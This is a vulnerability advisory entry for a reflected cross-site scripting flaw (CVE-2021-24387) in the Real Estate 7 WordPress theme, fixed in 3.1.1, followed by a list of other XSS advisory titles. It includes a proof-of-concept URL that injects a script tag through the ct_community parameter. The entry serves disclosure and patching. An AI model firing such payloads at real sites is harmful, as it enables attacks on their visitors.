Real Estate 7 < 3.1.1 – Reflected Cross-Site Scripting (XSS) | CVE 2021-24387 | Theme Vulnerabilities

Description

The theme did not properly sanitise the ct_community parameter in its search listing page before outputting it back in it, leading to a reflected Cross-Site Scripting which can be triggered in both unauthenticated or authenticated user context

Proof of Concept

https://example.com/?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert(document.domain);%3C/script%3E&ct_mls=&ct_brokerage=0&lat&lng

Affects Themes

Fixed in 3.1.1

References

CVE

URL

https://contempothemes.com/wp-real-estate-7/changelog/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Ex.Mi

Submitter

Ex.Mi

Submitter website

https://ex-mi.ru

Submitter twitter

Verified

Yes

WPVDB ID

27264f30-71d5-4d2b-8f36-4009a2be6745

Timeline

Publicly Published

2021-06-10 (about 2 years ago)

Added

2021-06-10 (about 2 years ago)

Last Updated

2022-01-17 (about 2 years ago)

Other

Published

Title

Published

2017-03-06

Title

WordPress 4.0-4.7.2 - Authenticated Stored Cross-Site Scripting (XSS) in YouTube URL Embeds

Published

2016-09-02

Title

WP-Piwik <= 1.0.10 - Unauthenticated Stored Cross-Site Scripting (XSS)

Published

2022-09-14

Title

Slider, Gallery, and Carousel by MetaSlider < 3.27.9 - Admin+ Stored Cross Site Scripting

Published

2024-03-09

Title

Save as PDF by Pdfcrowd < 3.2.2 - Admin+ Stored XSS

Published

2023-02-20

Title

wpDataTables < 2.1.50 - Contributor+ Stored XSS